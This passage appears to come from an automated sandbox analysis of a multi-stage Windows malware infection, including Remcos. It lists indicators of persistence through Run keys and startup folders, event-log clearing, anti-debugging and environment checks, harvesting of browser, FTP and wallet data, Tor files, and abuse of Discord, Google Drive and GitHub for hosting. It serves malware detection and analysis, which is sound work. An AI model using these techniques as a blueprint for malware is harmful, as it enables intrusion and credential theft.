| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3304_133785001843906793\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
Checks installed software on the system
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\schtasks.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
